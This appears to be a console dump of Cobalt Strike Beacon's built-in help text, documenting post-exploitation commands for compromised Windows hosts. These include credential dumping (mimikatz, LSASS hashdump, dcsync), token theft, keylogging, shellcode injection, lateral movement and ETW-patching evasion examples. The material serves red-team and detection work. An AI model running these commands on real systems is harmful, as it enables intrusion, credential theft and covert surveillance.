beacon> help remote-exec
Use: remote-exec [method] [target] [command]

Run a [command] on [target] via [method].

Type 'remote-exec' by itself to see a list of methods.

beacon> help blockdlls
Use: blockdlls [start|stop]

Launch child processes with a binary signature policy that blocks 
non-Microsoft DLLs from loading into the child process.

Use "blockdlls stop" to disable this behavior.

This feature requires Windows 10/Windows Server 2012 or later.

beacon> help argue
Use: argue [command] [fake arguments]
     argue [command]
     argue

Spoof [fake arguments] for [command] processes launched by Beacon.
This option does not affect runu/spawnu, runas/spawnas, or post-ex jobs.

Use argue [command] to disable this feature for the specified command.

Use argue by itself to list programs with defined spoofed arguments.

beacon> help runasadmin
Use: runasadmin [exploit] [command] [args]

Attempt to run the specified command in an elevated context.

Type runasadmin by itself to see a list of available local exploits.

beacon> help setenv
Use: setenv [key] [value]

Set an environment variable.

beacon> help reg
Use: reg query  [x86|x64] [root\path]
     reg queryv [x86|x64] [root\path] [subkey]

Use 'query' to query a key within the registry. Lists all subkeys and values.

Use 'queryv' to query a subkey within the registry. Lits only the subkey and 
its value.

Use HKLM, HKCR, HKCC, HKCU, or HKU for the root.

Specify x86|x64 to force a specific view of the registry.

beacon> help execute-assembly
Use: execute-assembly [/path/to/file.exe] [arguments]
Use: execute-assembly "[PATCHES: [patch-rule] [patch-rule] [patch-rule] [patch-rule]]" [/path/to/file.exe] [arguments]

Executes a local .NET process assembly on target. This command loads the CLR in a temporary
process and loads the assembly into it.

The optional "PATCHES:" argument can modify functions in memory for the process.
Up to 4 "patch-rule" rules can be specified (space delimited).

"patch-rule" syntax (comma delimited): [library],[function],[offset],[hex-patch-value]

library          - 1-260 characters
function         - 1-256 characters
offset           - 0-65535 (The offset from the start of the executable function)
hex-patch-value  - 2-200 hex characters (0-9,A-F). Length must be even number (hex pairs).

Examples: execute-assembly "PATCHES: ntdll.dll,EtwEventWrite,0,C300" [/path/to/file.exe] [arguments]
          execute-assembly "PATCHES: ntdll.dll,EtwEventWrite,0,C3 ntdll.dll,EtwEventWrite,1,00" [/path/to/file.exe] [arguments]

beacon> help dllload
Use: dllload [pid] [c:\path\to\file.dll]

Load DLL into specified remote process via LoadLibrary(). The DLL must exist on the target.

beacon> help getprivs
Use: getprivs

Enable as many system privileges as possible on current token

beacon> help kerberos_ticket_purge
Use: kerberos_ticket_purge

Purges kerberos tickets from this session

beacon> help kerberos_ccache_use
Use: kerberos_ccache_use [/path/to/file.ccache]

Applies a Kerberos ticket to this session from ccache file.

beacon> help kerberos_ticket_use
Use: kerberos_ticket_use [/path/to/file.ticket]

Applies a Kerberos ticket to this session

beacon> help kill
Use: kill [process id]

Kills the specified process

beacon> help process_browser
Use: process_browser

Open the process browser tab for this beacon.

beacon> help ps
Use: ps

Shows a list of processes

beacon> help timestomp
Use: timestomp [fileA] [fileB]

Update the Modified, Access, and Created times of fileA to match those of fileB

beacon> help getuid
Use: getuid

Prints the User ID associated with the current token

beacon> help rev2self
Use: rev2self

Revert to your original access token

beacon> help steal_token
Use: steal_token [pid]
     steal_token [pid] <OpenProcessToken access mask>

Steal an access token from a process.

OpenProcessToken access mask suggested values:
  blank = default (TOKEN_ALL_ACCESS)
      0 = TOKEN_ALL_ACCESS
     11 = TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_QUERY (1+2+8)

Access mask values:
  STANDARD_RIGHTS_REQUIRED . . . . : 983040
  TOKEN_ASSIGN_PRIMARY . . . . . . : 1
  TOKEN_DUPLICATE  . . . . . . . . : 2
  TOKEN_IMPERSONATE  . . . . . . . : 4
  TOKEN_QUERY  . . . . . . . . . . : 8
  TOKEN_QUERY_SOURCE . . . . . . . : 16
  TOKEN_ADJUST_PRIVILEGES  . . . . : 32
  TOKEN_ADJUST_GROUPS  . . . . . . : 64
  TOKEN_ADJUST_DEFAULT . . . . . . : 128
  TOKEN_ADJUST_SESSIONID . . . . . : 256

For more information, see the Trust Relationships user guide section.

beacon> help token-store

Use: token-store steal [pid,...] <OpenProcessToken access mask>
     token-store steal-and-use [pid] <OpenProcessToken access mask>
     token-store use [id]
     token-store show
     token-store remove [id,...]
     token-store remove-all

Use 'token-store steal' to steal an access token and store it in the token store.

Use 'token-store steal-and-use' to steal an access token, store it and immediately apply it to the current beacon.

Use 'token-store use' to use an access token from the token store.

Use 'token-store show' to print the access tokens currently available in the token store.

Use 'token-store remove' to remove specific access tokens from the store.

Use 'token-store remove-all' to remove all access tokens from the store

OpenProcessToken access mask suggested values:
  blank = default (TOKEN_ALL_ACCESS)
      0 = TOKEN_ALL_ACCESS
     11 = TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_QUERY (1+2+8)

Access mask values:
  STANDARD_RIGHTS_REQUIRED . . . . : 983040
  TOKEN_ASSIGN_PRIMARY . . . . . . : 1
  TOKEN_DUPLICATE  . . . . . . . . : 2
  TOKEN_IMPERSONATE  . . . . . . . : 4
  TOKEN_QUERY  . . . . . . . . . . : 8
  TOKEN_QUERY_SOURCE . . . . . . . : 16
  TOKEN_ADJUST_PRIVILEGES  . . . . : 32
  TOKEN_ADJUST_GROUPS  . . . . . . : 64
  TOKEN_ADJUST_DEFAULT . . . . . . : 128
  TOKEN_ADJUST_SESSIONID . . . . . : 256

For more information, see the Trust Relationships user guide section.

beacon> help getsystem
Use: getsystem

Attempts to get SYSTEM

beacon> help link
Use: link [target] [pipe]
     link [target]

Connect to an SMB Beacon and re-establish control of it. All requests for 
connected Beacon will go through this Beacon. Specify an explicit [pipe]
to link to that pipename. The default pipe from the current profile is
used otherwise.

beacon> help unlink
Use: unlink [ip address]
     unlink [ip address] [pid]

Disconnect from a named pipe or TCP Beacon.

Specify an IP address or an IP address and session PID to disconnect a specific Beacon.

beacon> help connect
Use: connect [target]
     connect [target] [port]

Connect to a TCP Beacon and re-establish control of it. All requests for 
connected Beacon will go through this Beacon.

Use 'unlink' to disconnect from a TCP Beacon.

beacon> help cd
Use: cd [directory]

Change directory on host

beacon> help checkin
Use: checkin

Forces DNS Beacon to connect to you. During a checkin Beacon posts its host
metadata and dumps logged keystrokes.

beacon> help clear
Use: clear

Clear beacon queue

beacon> help download
Use: download [file]

Download a file. Go to View -> Downloads to see it

beacon> help shell
Use: shell [command] [arguments]

Execute the command using cmd.exe

beacon> help powershell
Use: powershell [commandlet] [arguments]

Execute the command using powershell. Any cmdlets from the
last use of powershell-import are available here too.

beacon> help powershell-import
Use: powershell-import [/path/to/local/script.ps1]

Import a powershell script which is combined with future
calls to the powershell command. You may only use one
imported script at a time.

beacon> help execute
Use: execute [program] [arguments]

Execute the program. Does not block or return output.

beacon> help run
Use: run [program] [arguments]

Execute the program. Returns output.

beacon> help exit
Use: exit

Terminate the beacon session

beacon> help help
Use: help [command]

Display help for a command

beacon> help inject
Use: inject [pid] <x86|x64> [listener]

Open the process and inject shellcode for the listener

beacon> help shinject
Use: shinject [pid] <x86|x64> [/path/to/my.bin]

Open the process and inject shellcode into it

beacon> help shspawn
Use: shspawn <x86|x64> [/path/to/my.bin]

Spawn a process and inject shellcode into it.

beacon> help dllinject
Use: dllinject [pid] [/path/to/my.dll]

Open the process and injects a Reflective DLL

beacon> help keylogger
Use: keylogger [pid] [x86|x64]
     keylogger

Inject a keystroke logger into the specified process.

Use keylogger with no arguments to spawn a temporary process and inject the 
keystroke logger into it.

To terminate this task: use jobs to find the job ID. Use jobkill to kill it.

beacon> help message
Use: message [text]

Display a message to the user. This is a silly command.

beacon> help mode
Use: mode [dns|dns6|dns-txt]

Sets Beacon's mode to exchange data with the end-user. This only has an effect
on a DNS beacon.

mode dns
--------
Get tasks with DNS A record requests. Use this option to communicate with DNS 
when TXT records are not an option. Sends data as DNS requests with data encoded
inside of the hostname.

mode dns6
---------
Get tasks with DNS AAAA record requests. Use this option to communicate with DNS 
when TXT records are not an option. Sends data as DNS requests with data encoded
inside of the hostname.

mode dns-txt
------------
Get tasks with DNS TXT record requests. This channel carries 189 bytes per 
request versus 4 bytes for a DNS A record request. Sends data with the same
technique as the other DNS mode.

beacon> help socks
Use: socks [stop]
     socks [port]
     socks [port] [socks4]
     socks [port] [socks5]
     socks [port] [socks5] [enableNoAuth|disableNoAuth] [user] [password]
     socks [port] [socks5] [enableNoAuth|disableNoAuth] [user] [password] [enableLogging|disableLogging]

Starts a SOCKS4a (default) or SOCKS5 server on the specified port.
This server will relay connections through this Beacon.

SOCKS5 servers can be configured with NoAuth authentication (default),
User/Password authentication, and some additional logging.

SOCKS5 Servers currently do not support GSSAPI authentication,
UDP Association, and IPV6.

Use socks stop to stop the SOCKS servers and terminate existing connections.

Traffic will not relay while Beacon is asleep. Change the sleep time with the
sleep command to reduce latency.

beacon> help sleep
Use: sleep [time in seconds] <jitter>
     sleep <number of days>d <number of hours>h <number of minutes>m  <number of seconds>s <jitter>j

Change how often the beacon calls home. Use sleep 0 to force Beacon to call 
home many times each second. 

Specify a jitter value (0-99) to force Beacon to randomly modify its sleep time.

When setting long sleep periods it is easier to use the format that specifies
day, minutes, hours and seconds.

Example
-------
Set a sleep period of 2 hours and 30 minutes with jitter of 15%.

This can be achieved using:
     sleep 9000 15
or
     sleep 2h 30m 15j

Both set the same sleep period of 9000 seconds with a jitter of 15%.
The second option allows you to set the sleep period without the mathematics to
convert the required period into seconds.

beacon> help spawn
Use: spawn [x86|x64] [listener]
     spawn [listener]

Spawn an x86 or x64 process and inject shellcode for the listener.

beacon> help spawnto
Use: spawnto [x86|x64] [c:\path\to\whatever.exe]

Sets the executable Beacon spawns x86 and x64 shellcode into. You must specify a
full-path. Environment variables are OK (e.g., %windir%\sysnative\rundll32.exe)

Do not reference %windir%\system32\ directly. This path is different depending
on whether or not Beacon is x86 or x64. Use %windir%\sysnative\ and 
%windir%\syswow64\ instead.

Beacon will map %windir%\syswow64\ to system32 when WOW64 is not present.

beacon> help upload
Use: upload [/path/to/file]

Upload a file to host

beacon> help runas
Use: runas [DOMAIN\user] [password] [command] [arguments]

Attempt to execute a program as another user. If you don't specify DOMAIN,
Beacon will try to authenticate as a local user.

This command will usually fail if you're in a SYSTEM context.

beacon> help pwd
Use: pwd

Displays the current working directory of this Beacon.

beacon> help covertvpn
Use: covertvpn [interface] [ip address]

Deploy a Covert VPN to the target's system. You must have administrator
privileges for the client to work. 

Setup an [interface] through Cobalt Strike -> VPN Interfaces. The 
[ip address] is the IP address of the target interface you want to deploy
the VPN client to.

beacon> help browserpivot
Use: browserpivot [pid] [x86|x64]
     browserpivot [stop]

Setup a Browser Pivot into the specified process. To hijack authenticated
web sessions, make sure the process is an Internet Explorer tab. These
processes have iexplore.exe as their parent process.

Use "browserpivot stop" to tear down the browser pivoting sessions 
associated with this Beacon.

beacon> help desktop
Use: desktop [pid] [x86|x64] [high|low]
     desktop [high|low]

Injects a VNC server onto the target and connects to it. You may specify
whether or not the session is high or low-quality.

beacon> help jobs
Use: jobs

Lists long-running post-exploitation tasks. 

beacon> help jobkill
Use: jobkill [job ID]

Stop a long-running post-exploitation task.

beacon> help hashdump
Use: hashdump [pid] [x86|x64]
     hashdump

Inject the hashdump tool into the specified process

Use hashdump with no arguments to spawn a temporary process and inject the
hashdump tool into it.

The hashdump tool will dump password hashes (Warning: Injects into LSASS)
This command requires administrator privileges.
If injecting into a pid that process requires administrator privileges.

beacon> help mimikatz
Use: mimikatz [pid] [arch] [module::command] <args>
     mimikatz [pid] [arch] [!module::command] <args>
     mimikatz [pid] [arch] [@module::command] <args>
     mimikatz [module::command] <args>
     mimikatz [!module::command] <args>
     mimikatz [@module::command] <args>

Inject into the specified process to run a mimikatz command.

Use mimikatz with no [pid] and [arch] arguments to spawn a temporary
process to run a mimikatz command.

Use ! to make mimikatz elevate to SYSTEM before it runs your command. Some
commands require this.

Use @ to make mimikatz impersonate Beacon's thread token before it runs your
command. This is helpful for mimikatz commands that interact with remote
systems (e.g., lsadump::dcsync)

Use ; to separate multiple mimikatz commands.  The maximum length of the commands
is 511 characters.
Example:
   mimikatz crypto::capi ; crypto::certificates /systemstore:local_machine /store:my /export

beacon> help pth
Use: pth [pid] [arch] [DOMAIN\user] [NTLM hash]
     pth [DOMAIN\user] [NTLM hash]

Inject into the specified process to generate AND impersonate a token.

Use pth with no [pid] and [arch] arguments to spawn a temporary
process to generate AND impersonate a token.

This command uses mimikatz to generate AND impersonate a token that uses the
specified DOMAIN, user, and NTLM hash as single sign-on credentials. Beacon
will pass this hash when you interact with network resources.

beacon> help screenshot
Use: screenshot [pid] [x86|x64]
     screenshot 

Inject a screenshot tool into the specified process.

Use screenshot with no arguments to spawn a temporary process and inject the 
screenshot tool into it.

Screenshot takes a picture of the visible desktop and exits.

beacon> help printscreen
Use: printscreen [pid] [x86|x64]
     printscreen 

Inject a screenshot tool into the specified process.

Use printscreen with no arguments to spawn a temporary process and inject the 
screenshot tool into it.

Printscreen forces a PrintScr keypress and grabs the screenshot from the
clipboard. It then exits. This command will clear the clipboard contents after
its done.

No long-running variant of this exists because... let's face it... nuking the
clipboard periodically is probably not good OPSEC.

beacon> help screenwatch
Use: screenwatch [pid] <x86|x64>
     screenwatch 

Inject a screen watcher tool into the specified process.

Use screenwatch with no arguments to spawn a temporary process and inject the 
screen watch tool into it.

Screenwatch sends a screenshot of the user's desktop (one per Beacon check-in)
until terminated. If the user is idle, the screen watch tool will take a new
screenshot every three minutes.

To terminate this task: use jobs to find the job ID. Use jobkill to kill it.

beacon> help make_token
Use: make_token [DOMAIN\user] [password]

Clone the current access token and set it up to pass the specified username
and password when you interact with network resources. This command does not
validate the credentials you provide and it has no effect on local actions.

beacon> help downloads
Use: downloads

Lists file downloads currently in progress.

beacon> help cancel
Use: cancel [*file*]

Cancels a download that is currently in progress. Wildcards are OK.

beacon> help rportfwd
Use: rportfwd [bind port] [forward host] [forward port]
     rportfwd stop [bind port]

Binds the specified port on the target host. When a connection comes in,
Cobalt Strike will make a connection to the forwarded host/port and use Beacon
to relay traffic between the two connections.

beacon> help rportfwd_local
Use: rportfwd_local [bind port] [forward host] [forward port]
     rportfwd_local stop [bind port]

Binds the specified port on the target host. When a connection comes in,
Cobalt Strike will make a connection to the forwarded host/port, via your
Cobalt Strike client, and use Beacon to relay traffic between the two connections.

beacon> help elevate
Use: elevate [exploit] [listener]

Attempt to spawn an elevated session with the specified exploit.

Type elevate by itself to see a list of available local exploits.

beacon> help jump
Use: jump [exploit] [target] [listener]

Attempt to spawn a session on a remote target with the specified exploit.

Type jump by itself to see a list of available remote exploits.

beacon> help file_browser
Use: file_browser

Open the file browser tab for this beacon. Starts in the current directory.

beacon> help mkdir
Use: mkdir [folder]

Make a directory

beacon> help ls
Use: ls [folder]

Lists files in a folder

beacon> help rm
Use: rm [folder]

Removes a file or folder

beacon> help drives
Use: drives

Lists drives on current system

beacon> help spawnas
Use: spawnas [DOMAIN\user] [password] [listener]

Attempt to spawn a payload as another user. If you don't specify DOMAIN,
Beacon will try to authenticate as a local user.

This command will usually fail if you're in a SYSTEM context. Use make_token
to create a token to pass the desired credentials instead.

beacon> help portscan
Use: portscan [pid] [arch] [targets] [ports] [arp|icmp|none] [max connections]
     portscan [targets] [ports] [arp|icmp|none] [max connections]

Inject into the specified process to run a port scan against the specified hosts.

Use portscan with no [pid] and [arch] arguments to spawn a temporary
process to run a port scan against the specified hosts.

[targets] is a comma separated list of hosts to scan. You may also specify
IPv4 address ranges (e.g., 192.168.1.128-192.168.2.240, 192.168.1.0/24)

[ports] is a comma separated list or ports to scan. You may specify port
ranges as well (e.g., 1-65535)

The [arp|icmp|none] options dictate how the port scanning tool will determine
if a host is alive. The ARP option uses ARP to see if a system responds to the
specified address. The ICMP option sends an ICMP echo request. The none option 
tells the portscan tool to assume all hosts are alive.

The [max connections] option limits how many connections the port scan tool
will attempt at any one time. The portscan tool uses asynchronous I/O and
it's able to handle a large number of connections at one time. A higher value
will make the portscan go much faster. The default is 1024.

beacon> help net
Use:net [pid] [arch] [command] [arguments]
    net [command] [arguments]

Inject the network and host enumeration tool into the specified process

Use net with no [pid] and [arch] arguments to spawn a temporary
process and inject the network and host enumeration tool into it.

Beacons's network and host enumeration tool. The built-in net commands are:

        Command             Description
        -------             -----------
        computers           lists hosts in a domain (groups)
        dclist              lists domain controllers
        domain              display domain for this host
        domain_controllers  lists DCs in a domain (groups)
        domain_trusts       lists domain trusts
        group               lists groups and users in groups
        localgroup          lists local groups and users in local groups
        logons              lists users logged onto a host
        sessions            lists sessions on a host
        share               lists shares on a host
        user                lists users and user information
        time                show time for a host
        view                lists hosts in a domain (browser service)

Use "help net [command]" for more information. 

beacon> help net dclist
Use: net [pid] [arch] dclist <DOMAIN>
     net dclist <DOMAIN>

Inject the network and host enumeration tool into the specified process

Use net with no [pid] and [arch] arguments to spawn a temporary
process and inject the network and host enumeration tool into it.

Lists domain controllers for the specified domain. If no domain is specified
this command will use the current domain. 

beacon> help net domain
Use: net domain

This command executes a BOF using inline_execute and will not spawn or inject into a process.

Find active directory domain for this system

beacon> help net domain_trusts
Use: net [pid] [arch] domain_trusts <DOMAIN>
     net domain_trusts <DOMAIN>

Inject the network and host enumeration tool into the specified process

Use net with no [pid] and [arch] arguments to spawn a temporary
process and inject the network and host enumeration tool into it.

Lists domain trusts for the specified domain. If no domain is specified this
command will use the current domain.

beacon> help net group
Use: net [pid] [arch] group <\\TARGET> <GROUPNAME>
     net group <\\TARGET> <GROUPNAME>

Inject the network and host enumeration tool into the specified process

Use net with no [pid] and [arch] arguments to spawn a temporary
process and inject the network and host enumeration tool into it.

Use net group by itself to enumerate groups on a domain controller. You may
specify a specific domain controller with the target option. Specify a group
name to get a list of users in a group on a domain controller.

beacon> help net localgroup
Use: net [pid] [arch] localgroup <\\TARGET> <GROUPNAME>
     net localgroup <\\TARGET> <GROUPNAME>

Inject the network and host enumeration tool into the specified process

Use net with no [pid] and [arch] arguments to spawn a temporary
process and inject the network and host enumeration tool into it.

Use net localgroup by itself to enumerate local groups on this system. Specify
a target to enumerate local groups on a remote system. Specify a group name to
get a list of user in a local group on a target.

beacon> help net logons
Use: net [pid] [arch] logons <\\TARGET>
     net logons <\\TARGET>

Inject the network and host enumeration tool into the specified process

Use net with no [pid] and [arch] arguments to spawn a temporary
process and inject the network and host enumeration tool into it.

Lists users logged onto a target.

beacon> help net sessions
Use: net [pid] [arch] sessions <\\TARGET>
     net sessions <\\TARGET>

Inject the network and host enumeration tool into the specified process

Use net with no [pid] and [arch] arguments to spawn a temporary
process and inject the network and host enumeration tool into it.

Lists sessions on a target

beacon> help net share
Use: net [pid] [arch] share <\\TARGET>
     net share <\\TARGET>

Inject the network and host enumeration tool into the specified process

Use net with no [pid] and [arch] arguments to spawn a temporary
process and inject the network and host enumeration tool into it.

Lists shares on a target

beacon> help net time
Use: net [pid] [arch] time <\\TARGET>
     net time <\\TARGET>

Inject the network and host enumeration tool into the specified process

Use net with no [pid] and [arch] arguments to spawn a temporary
process and inject the network and host enumeration tool into it.

Show time for the target

beacon> help net user
Use: net [pid] [arch] user <\\TARGET> <USER>
     net user <\\TARGET> <USER>

Inject the network and host enumeration tool into the specified process

Use net with no [pid] and [arch] arguments to spawn a temporary
process and inject the network and host enumeration tool into it.

Use net user by itself to list users on this system. Specify a target to list
users on a remote system. Specify a user to get information about a user.

beacon> help net view
Use: net [pid] [arch] view <DOMAIN>
     net view <DOMAIN>

Inject the network and host enumeration tool into the specified process

Use net with no [pid] and [arch] arguments to spawn a temporary
process and inject the network and host enumeration tool into it.

Use net view by itself to list hosts on the current domain. Specify a domain
to list hosts on another domain.

beacon> help net computers
Use: net [pid] [arch] computers <DOMAIN.FQDN>
     net computers <DOMAIN.FQDN>

Inject the network and host enumeration tool into the specified process

Use net with no [pid] and [arch] arguments to spawn a temporary
process and inject the network and host enumeration tool into it.

Use net computers to list hosts from the Domain Computers and Domain Controllers
groups on the specified domain. Please specify the DOMAIN as a fully-qualified
domain name.

beacon> help net domain_controllers
Use: net [pid] [arch] domain_controllers <DOMAIN.FQDN>
     net domain_controllers <DOMAIN.FQDN>

Inject the network and host enumeration tool into the specified process

Use net with no [pid] and [arch] arguments to spawn a temporary
process and inject the network and host enumeration tool into it.

Use net domain_controllers to list hosts from the Domain Controllers group on
the specified domain. Please specify the DOMAIN as a fully-qualified domain name.

beacon> help logonpasswords
Use: logonpasswords [pid] [arch]
     logonpasswords

Inject into the specified process to dump plaintext credentials
and NTLM hashes.

Use logonpasswords with no [pid] and [arch] arguments to spawn
a temporary process to dump plaintext credentials and NTLM hashes.

This command uses mimikatz and requires administrator privileges.

beacon> help note
Use: note [text]

Assigns a note to this Beacon.

beacon> help dcsync
Use: dcsync [pid] [arch] [DOMAIN.fqdn] <DOMAIN\user>
     dcsync [DOMAIN.fqdn] <DOMAIN\user>

Inject into the specified process to extract the NTLM password hashes.

Use dcsync with no [pid] and [arch] arguments to spawn a temporary
process to extract the NTLM password hashes.

This command uses mimikatz to extract the NTLM password hash for domain
users from the domain controller. Specify a user to get their hash only.
This command requires a domain administrator trust relationship.

beacon> help powerpick
Use: powerpick [commandlet] [arguments]
     powerpick "[PATCHES: [patch-rule] [patch-rule] [patch-rule] [patch-rule]]" [commandlet] [arguments]

Execute the command using Unmanaged PowerShell. Any cmdlets from the
last use of powershell-import are available here too.

The optional "PATCHES:" argument can modify functions in memory for the process.
Up to 4 "patch-rule" rules can be specified (space delimited).

"patch-rule" syntax (comma delimited): [library],[function],[offset],[hex-patch-value]

library          - 1-260 characters
function         - 1-256 characters
offset           - 0-65535 (The offset from the start of the executable function)
hex-patch-value  - 2-200 hex characters (0-9,A-F). Length must be even number (hex pairs).

Examples: powerpick "PATCHES: ntdll.dll,EtwEventWrite,0,C300" [commandlet] [arguments]
          powerpick "PATCHES: ntdll.dll,EtwEventWrite,0,C3 ntdll.dll,EtwEventWrite,1,00" [commandlet] [arguments]

beacon> help psinject
Use: psinject [pid] [arch] [commandlet] [arguments]

Inject Unmanaged PowerShell into a specific process and execute the
specified command. Any cmdlets from the last use of powershell-import are 
available here too.

beacon> help ssh
Use: ssh [pid] [arch] [target:port] [user] [pass]
     ssh [target:port] [user] [pass]

Inject into the specified process to run an SSH client and attempt
to login to the specified target.

Use ssh with no [pid] and [arch] arguments to spawn a temporary
process to run an SSH client and attempt to login to the specified target.


beacon> help ssh-key
Use: ssh-key [pid] [arch] [target:port] [user] [/path/to/key.pem]
     ssh-key [target:port] [user] [/path/to/key.pem]

Inject into the specified process to run an SSH client and attempt
to login to the specified target.

Use ssh-key with no [pid] and [arch] arguments to spawn a temporary
process to run an SSH client and attempt to login to the specified target.

The key file needs to be in the PEM format.  If the file is not in the
PEM format then make a copy of the file and convert the copy with the
following command:
   /usr/bin/ssh-keygen -f [/path/to/copy] -e -m pem -p

beacon> help cp
Use: cp [source file] [dest file]

Copy source file to the specified destination

beacon> help mv
Use: mv [source file] [dest file]

Move source file to the specified destination

beacon> help ppid
Use: ppid [pid]

Use specified PID as parent for processes Beacon launches. The runas command
is not affected, but most other commands are.

Type ppid by itself to reset to default behavior.

WARNING: Do not specify a parent PID in another desktop session. This may 
break several of Beacon's features and workflows. Use runu if you want to run 
a command under a parent in another desktop session.

beacon> help runu
Use: runu [pid] [command] [arguments]

Attempt to execute a program with the specified PID as its parent. This program
will run with the identity of the specified PID.

beacon> help spawnu
Use: spawnu [pid] [listener]

Attempt to spawn a session with the specified PID as its parent. This session
will run with the identity of the specified PID.

beacon> help inline-execute
Use: inline-execute [/path/to/file.o] [args]

Run a Beacon Object File in this Beacon session. A Beacon Object File is a 
C program, compiled as an object file, written to use conventions specified 
in the Cobalt Strike documentation.

beacon> help spunnel
Use: spunnel [x86|x64] [host] [port] [/path/to/agent.bin]

This is the spawn and tunnel command. Spawn an agent and create a reverse 
port forward tunnel to its controller.

beacon> help spunnel_local
Use: spunnel_local [x86|x64] [host] [port] [/path/to/agent.bin]

This is the spawn and tunnel command. Spawn an agent and create a reverse
port forward, tunnelled through your Cobalt Strike client, to its controller.

beacon> help chromedump
Use: chromedump [pid] [arch]
     chromedump

Inject into the specified process to recover credential material
from Google Chrome.

Use chromedump with no [pid] and [arch] arguments to spawn a temporary
process to recover credential material from Google Chrome.

This command will use Mimikatz to recover the credential material and
should be run under a user context.

beacon> help data-store

Use: data-store load [file|bof|dotnet] [item path]
     data-store load [file|bof|dotnet] [name] [item path]
     data-store unload [index]
     data-store list

Use 'data-store load' to load post-ex items to Beacon. If the name is omitted,
then the file name is used.

Use 'data-store unload' to remove specific post-ex item from the store.

Use 'data-store list' to print the post-ex items currently available in the data store.

beacon> help history
Use: history
     history all
     history [number]

Show the command history.

Use history without the [number] argument to list all the commands in the
history.

Use history without the all argument to list all the commands in the
history.

Use history with the [number] argument to only show that number of most
recent commands.

beacon> help syscall-method
Use: syscall-method <method>

Change the syscall method at runtime. Valid method types are: None, Direct, Indirect

syscall-method without any arguments will query the current syscall method

beacon> help !
Use: !!
     ![number]
     ! [number]
     ![string]
     ! [string]
     !?[string]
     ! ?[string]

Run a command from the history. The history can be viewed using the history command.

"!!" runs the most recent command from the history. Equivalent to running "!-1" or "! -1".

"![number]" or "! [number]" run a specific command from the history.
   when a positive number it runs the command at that number in the history (e.g. !1 is the command at position 1 in the history)
   when a negative number it runs the command which is that number of commands back in the history (e.g. !-1 is the last command)

"![string]" or "! [string]" find the most recent command in the history that starts with the string and run it.

"!?[string]" or "! ?[string]" find the most recent command in the history that contains the string and run it.

beacon> help windows_error_code
Use: windows_error_code [number]

Show the Windows error code for a Windows error code number

beacon> help clipboard
Use: clipboard

Attempts to get text clipboard contents
